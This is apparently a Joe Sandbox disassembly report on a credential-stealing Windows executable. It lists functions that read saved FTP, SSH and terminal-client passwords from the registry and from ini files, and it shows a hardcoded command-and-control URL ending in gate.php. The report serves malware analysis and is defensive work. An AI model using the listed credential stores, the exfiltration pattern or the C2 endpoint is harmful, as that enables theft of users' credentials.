Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorFreeHandleLastLocalOpenStringlstrcmp
String ID: S-1-5-18
API String ID: 795010888-4289277601
Opcode ID: 36515c749170abb860dd3c67fea4b3fd00c7623ca2813102fb0c76df3f57f51a
Instruction ID: bdd3f126c014c621d48c9bcb1f04be72404d12141371039d74620685035d047b
Opcode Fuzzy Hash: 36515c749170abb860dd3c67fea4b3fd00c7623ca2813102fb0c76df3f57f51a
Instruction Fuzzy Hash: B6211031904109BBEF11AFA4DD4ABEE77B5FB40305F104476A111B51E4D7B9AA80DB1C

Uniqueness

Uniqueness Score: -1.00%

Function 004065F9 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 0040660F
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406643
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406876

Strings

Port, xrefs: 004066F7
Host, xrefs: 00406698
Login, xrefs: 004066B6
Password, xrefs: 0040667A
PasswordType, xrefs: 0040673B
InitialPath, xrefs: 004066D4

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$InitialPath$Login$Password$PasswordType$Port
API String ID: 1332880857-4069465341
Opcode ID: 84345bfc68a64b25a190d13fdbbc86dd649292805299842e1fadc721dbb1f0e3
Instruction ID: 878f0c8ae7a6c9400d3b253364e2bd7f4d064004aa8922325b96e6fe1a9462ad
Opcode Fuzzy Hash: 84345bfc68a64b25a190d13fdbbc86dd649292805299842e1fadc721dbb1f0e3
Instruction Fuzzy Hash: BF51E831940118EADF21BB51DC01BE97ABABF44748F10C0BAB549751B1CB7A5BA1EF88

Uniqueness

Uniqueness Score: -1.00%

Function 0040CFDC Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 147
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040CFEF
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D023
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D22C

Strings

Password, xrefs: 0040D05D
PortNumber, xrefs: 0040D0B3
ServerType, xrefs: 0040D114
InitialDirectory, xrefs: 0040D0F9
UserID, xrefs: 0040D093
ServerName, xrefs: 0040D078

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: InitialDirectory$Password$PortNumber$ServerName$ServerType$UserID
API String ID: 1332880857-2649023343
Opcode ID: 8b6f605d331ed2eb21dd8c45bc62cd68acc31ccb83cfb8b85bcfbb77218c75a1
Instruction ID: b084cf9da2bdd287e3e1080d31f42b2e71d0dceb83c6c61ab017eaa017c6baff
Opcode Fuzzy Hash: 8b6f605d331ed2eb21dd8c45bc62cd68acc31ccb83cfb8b85bcfbb77218c75a1
Instruction Fuzzy Hash: 1851A631940118BADF216F91CC02BDD7ABABF04348F14C0BAB549750B1CF7A9B95AF99

Uniqueness

Uniqueness Score: -1.00%

Function 00407B24 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 146
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407B37
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407B6B
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407D81

Strings

RemoteDirectory, xrefs: 00407BF4
HostName, xrefs: 00407BBE
Password, xrefs: 00407BA3
UserName, xrefs: 00407BD9
PortNumber, xrefs: 00407C14
FSProtocol, xrefs: 00407C62

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: FSProtocol$HostName$Password$PortNumber$RemoteDirectory$UserName
API String ID: 1332880857-3874328862
Opcode ID: 65d403c67bbe0a054c1484cbcf03ac541fc213f814df095ff6efd5f2d87731f5
Instruction ID: f805444a8a64015e573bfb1de7972a85676777f0e267872700d8a7a72d5561cf
Opcode Fuzzy Hash: 65d403c67bbe0a054c1484cbcf03ac541fc213f814df095ff6efd5f2d87731f5
Instruction Fuzzy Hash: 6C51A73194411CEADF216F51CC01BED7AB9BF04344F10C0BAB649751B1DB7AAB91AF89

Uniqueness

Uniqueness Score: -1.00%

Function 0040DBCC Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 133
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DBDF
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DC13
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DDFC

Strings

FTP destination user, xrefs: 0040DC66
FTP destination port, xrefs: 0040DCA1
FTP destination password, xrefs: 0040DC81
FTP profiles, xrefs: 0040DCDC
FTP destination catalog, xrefs: 0040DCBC
FTP destination server, xrefs: 0040DC4B

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: FTP destination catalog$FTP destination password$FTP destination port$FTP destination server$FTP destination user$FTP profiles
API String ID: 1332880857-3620412361
Opcode ID: 5a8e3768825524a2e99e9cfe0fe42f4ea31c44571ad2d014b2a231d556178f05
Instruction ID: 853624f4fa92df84ede45b07656b96259bd83cd000f47ef9506ca94c475e3085
Opcode Fuzzy Hash: 5a8e3768825524a2e99e9cfe0fe42f4ea31c44571ad2d014b2a231d556178f05
Instruction Fuzzy Hash: 74516531950118EADF226F91CC02BDD7AB6BF04344F1084BAB549751B1CE7A9BA5AF88

Uniqueness

Uniqueness Score: -1.00%

Function 00407E76 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 126
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407E89
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407EBD
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408085

Strings

RootDirectory, xrefs: 00407F4B
Port, xrefs: 00407F66
PassWord, xrefs: 00407EFA
ServerType, xrefs: 00407F81
UserName, xrefs: 00407F30
Url, xrefs: 00407F15

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: PassWord$Port$RootDirectory$ServerType$Url$UserName
API String ID: 1332880857-2128033141
Opcode ID: 07b26acbe88f52de618a0be8a6e636aa3ca99ca38f778b9515488a6349ad238c
Instruction ID: 70b2bd0d1af28af51c7f8960c38eb232a343b8d8856aae17bf274a6d209453ed
Opcode Fuzzy Hash: 07b26acbe88f52de618a0be8a6e636aa3ca99ca38f778b9515488a6349ad238c
Instruction Fuzzy Hash: 3D517531940118FADF216F51CC02BDD7AB9BF04344F14C0BAB659740B1DB7A9B91AF88

Uniqueness

Uniqueness Score: -1.00%

Function 00402665 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 84
registryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyA.ADVAPI32(Software\WinRAR,?), ref: 00402680
RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,00000000,?,0040FCE6,Client Hash,?,00000010,00000000,?,00000000,out.bin), ref: 00402699
RegCloseKey.ADVAPI32(?,?,?,00000000,00000003,?,00000000,?,0040FCE6,Client Hash,?,00000010,00000000,?,00000000,out.bin), ref: 004026A6
GetTempPathA.KERNEL32(00000104,?,?,0040FCE6,Client Hash,?,00000010,00000000,?,00000000,out.bin), ref: 004026BF
CreateDirectoryA.KERNEL32(?,00000000,00000104,?,?,0040FCE6,Client Hash,?,00000010,00000000,?,00000000,out.bin), ref: 004026E0
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,?,?,?,?,00000000,00000104,?,?,0040FCE6), ref: 0040273B
CloseHandle.KERNEL32(?,?,?,00000000,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,?,?,?,00000000), ref: 00402759
DeleteFileA.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,?,?,?,00000000,00000104,?), ref: 00402768

Strings

Software\WinRAR, xrefs: 00402675

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: Create$CloseFile$DeleteDirectoryHandlePathTempValue
String ID: Software\WinRAR
API String ID: 3443402316-224198155
Opcode ID: 60be2eb34dc850eeae92880680489a053bb4ce950e80636a5ad3e24dee92d46f
Instruction ID: 8325f711e9590314f160a872c62a1e1bd33f9c487bbd8686b8ebefcfde768a06
Opcode Fuzzy Hash: 60be2eb34dc850eeae92880680489a053bb4ce950e80636a5ad3e24dee92d46f
Instruction Fuzzy Hash: 7D218131A4020DBBDF21BFE1CD86FDE7A69AB04748F104476B704B50E1D6F99AD09B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040E963 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 83registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401857: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BFC,00000000), ref: 00401865

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E986
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040E9BA
GetPrivateProfileStringA.KERNEL32(Program,DataPath,0041487A,?,00000104,00000000), ref: 0040EA40
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040EA99

Strings

DataPath, xrefs: 0040EA36
accounts.ini, xrefs: 0040EA4F
Path, xrefs: 0040E9F2
Program, xrefs: 0040EA3B
\PocoSystem.ini, xrefs: 0040EA14

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: AllocCloseEnumLocalOpenPrivateProfileString
String ID: DataPath$Path$Program$\PocoSystem.ini$accounts.ini
API String ID: 1343824468-2495907966
Opcode ID: bbd8532d5a3ca6f3a854f878ec97e99659a8773a8d88ee58fd439b5b4db76608
Instruction ID: 065ea3b02407bdf2a25c53734ac3e7a6de9906891c903f9d88a0898bd299829e
Opcode Fuzzy Hash: bbd8532d5a3ca6f3a854f878ec97e99659a8773a8d88ee58fd439b5b4db76608
Instruction Fuzzy Hash: 2B310E71940118BADF11BB62CC02FDE7AB9BF04344F10C4BAB655740E1DEB99B919F98

Uniqueness

Uniqueness Score: -1.00%

Function 00404FB5 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 83COMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00404FD9

Part of subcall function 00401D80: lstrlen.KERNEL32(?,?,?,0040210A,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401DA1
Part of subcall function 00401D80: lstrlen.KERNEL32(?,?,?,?,0040210A,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401DAB
Part of subcall function 00401D80: lstrcpy.KERNEL32(00000000,?), ref: 00401DBF
Part of subcall function 00401D80: lstrcat.KERNEL32(00000000,?), ref: 00401DC8

GetPrivateProfileStringA.KERNEL32(WS_FTP,DIR,0041487A,?,00000104,?), ref: 00405029
GetPrivateProfileStringA.KERNEL32(WS_FTP,DEFDIR,0041487A,?,00000104,?), ref: 00405064

Strings

WS_FTP, xrefs: 00405024, 0040505F
DEFDIR, xrefs: 0040505A
\Ipswitch, xrefs: 004050B0, 004050BF, 004050CE
\win.ini, xrefs: 00404FF1
\Ipswitch\WS_FTP, xrefs: 00405094
DIR, xrefs: 0040501F

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: PrivateProfileStringlstrlen$DirectoryWindowslstrcatlstrcpy
String ID: DEFDIR$DIR$WS_FTP$\Ipswitch$\Ipswitch\WS_FTP$\win.ini
API String ID: 2508676433-45949541
Opcode ID: 19aeb1cea9ddfc88884726efda8fe400dfc8fc0eac1c30a3f564b0a5d6fb1485
Instruction ID: ab3c31a5c4c249bdb520c908c148d3b099145b77129a910e1eddc1aa6619180a
Opcode Fuzzy Hash: 19aeb1cea9ddfc88884726efda8fe400dfc8fc0eac1c30a3f564b0a5d6fb1485
Instruction Fuzzy Hash: F2211271A80608BADF22BA61CC43FDD7629AB54744F100477B718B41E2D6F99AD09A9C

Uniqueness

Uniqueness Score: -1.00%

Function 00406367 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 140registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 0040637D
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004063B1
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004065BF

Strings

Host, xrefs: 00406401
SSH, xrefs: 004064AE
PthR, xrefs: 0040643D
User, xrefs: 0040641F
Port, xrefs: 00406460

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$Port$PthR$SSH$User
API String ID: 1332880857-1643752846
Opcode ID: 60ecbcf5d00f9412a0a0a975d5bf3858ab11a02a7709e7a56bc09fb87b84d95f
Instruction ID: 01ae609f72be3265498426662d59751bf6be68cab83ae5e2f3ad3239e34ac037
Opcode Fuzzy Hash: 60ecbcf5d00f9412a0a0a975d5bf3858ab11a02a7709e7a56bc09fb87b84d95f
Instruction Fuzzy Hash: 5651B731940118FADF21BB51DC02BDD7AB9BF44744F10C0BAB549741B1CE7A9BA1AF98

Uniqueness

Uniqueness Score: -1.00%

Function 00405EB6 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 121registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00405ECC
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405F00
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004060AC

Part of subcall function 00401840: LocalFree.KERNEL32(00000000,?,00402C4E), ref: 0040184C

Strings

RemoteDir, xrefs: 00405F92
HostAdrs, xrefs: 00405F56
UserName, xrefs: 00405F74
Port, xrefs: 00405FB5
Password, xrefs: 00405F38

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseEnumFreeLocalOpen
String ID: HostAdrs$Password$Port$RemoteDir$UserName
API String ID: 3369285772-3748300950
Opcode ID: 3eef46e855b5de74e47a1e3bafaa353cf08f647c0ea7cb50f90dd4b14aed3e52
Instruction ID: 39ca36e60b618003e931d6f2294aafb7eef81d7a4abdb7cbbabd05731a406633
Opcode Fuzzy Hash: 3eef46e855b5de74e47a1e3bafaa353cf08f647c0ea7cb50f90dd4b14aed3e52
Instruction Fuzzy Hash: F7419931940118EADF217B91DC02BDD7ABABF44348F14C0BAB549741B1CE7A9B91AF98

Uniqueness

Uniqueness Score: -1.00%

Function 004070E6 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 004070F9
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040712D
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004072BF

Strings

_Password, xrefs: 00407180
Server, xrefs: 0040719B
Directory, xrefs: 004071D1
UserName, xrefs: 004071B6
Password, xrefs: 00407165

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Directory$Password$Server$UserName$_Password
API String ID: 1332880857-3317168126
Opcode ID: 91a3430297682f1515cf5639edcee885a8a2173a02c3f2d271bff4e8f18c4c5a
Instruction ID: 609de703010df0139157c9bf80d0129cbe541510f610675190dbdb5970859ea4
Opcode Fuzzy Hash: 91a3430297682f1515cf5639edcee885a8a2173a02c3f2d271bff4e8f18c4c5a
Instruction Fuzzy Hash: B841B73194411CBADF21AF51CC02BDD7AB9BF04348F10C1BAB659741B1CB7A5B91AF88

Uniqueness

Uniqueness Score: -1.00%

Function 0040D964 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040D977
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D9AB
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DB3F

Strings

TerminalType, xrefs: 0040DA54
Password, xrefs: 0040DA19
PortNumber, xrefs: 0040DA39
UserName, xrefs: 0040D9FE
HostName, xrefs: 0040D9E3

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: HostName$Password$PortNumber$TerminalType$UserName
API String ID: 1332880857-1017491782
Opcode ID: b0428f9079e510ebe99fc0758f1cff2203469d3d283a4d01df23076d9d268fc8
Instruction ID: f8484dbc3babf97c2c1a5d20cc61e3d4d66e17aaea75947d27f541899551e878
Opcode Fuzzy Hash: b0428f9079e510ebe99fc0758f1cff2203469d3d283a4d01df23076d9d268fc8
Instruction Fuzzy Hash: 40417771950118FADF616F51CC02BDDBAB5BF04348F10C0BAB649741B1CE7A9BA5AF88

Uniqueness

Uniqueness Score: -1.00%

Function 00407311 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407324
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407358
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004074EA

Strings

FtpDirectory, xrefs: 004073FC
FtpServer, xrefs: 004073C6
FtpPassword, xrefs: 00407390
_FtpPassword, xrefs: 004073AB
FtpUserName, xrefs: 004073E1

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: FtpDirectory$FtpPassword$FtpServer$FtpUserName$_FtpPassword
API String ID: 1332880857-980612798
Opcode ID: fc2f6b1155d9c414315b957c8c91863a1290ae2606c3669dfa302148dd6ac8a0
Instruction ID: bd274eef2e46a4ff76715892e6b75a2180ea3a08c7d11dab128668f5ec6988b3
Opcode Fuzzy Hash: fc2f6b1155d9c414315b957c8c91863a1290ae2606c3669dfa302148dd6ac8a0
Instruction Fuzzy Hash: 3941B63194011CBADF21AF51CC02BDD7AB9BF04344F10C1BABA59750B1CB7A9B91AF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040614E Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 112registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00406164
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406198
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040632D

Strings

Port, xrefs: 0040620C
HostName, xrefs: 004061EE
HostDirName, xrefs: 00406248
Password, xrefs: 004061D0
Username, xrefs: 0040622A

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: HostDirName$HostName$Password$Port$Username
API String ID: 1332880857-791697221
Opcode ID: c81139fcbf56941dcaf60ac0b767e2ad163483dd27e740059d073d05bb458d1f
Instruction ID: cb269819793aedec253ab9809a349585ec349e437966f923a3b307ae1727fb08
Opcode Fuzzy Hash: c81139fcbf56941dcaf60ac0b767e2ad163483dd27e740059d073d05bb458d1f
Instruction Fuzzy Hash: 7041A931940118FADF217B91DC02BDD7ABABF44344F14C0BAB659740B1DB7A5BA1AF88

Uniqueness

Uniqueness Score: -1.00%

Function 00403B69 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 112networkstringCOMMON

Download Yara Rule

APIs

Part of subcall function 00401857: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BFC,00000000), ref: 00401865

InternetCrackUrlA.WININET(?,00000000,80000000,?), ref: 00403BD5
InternetCreateUrlA.WININET(?,80000000,?,?), ref: 00403C00
InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 00403C46
wsprintfA.USER32 ref: 00403C65
lstrlen.KERNEL32(?,?,00000000,?), ref: 00403C88
closesocket.WSOCK32(?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00403CB2

Strings

http://assuredexpresscourierservice.com/ponzy/Panelnew/gate.php, xrefs: 00403B6F
GET %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), xrefs: 00403C5D

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: Internet$Crack$AllocCreateLocalclosesocketlstrlenwsprintf
String ID: GET %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)$http://assuredexpresscourierservice.com/ponzy/Panelnew/gate.php
API String ID: 4072649068-3295216763
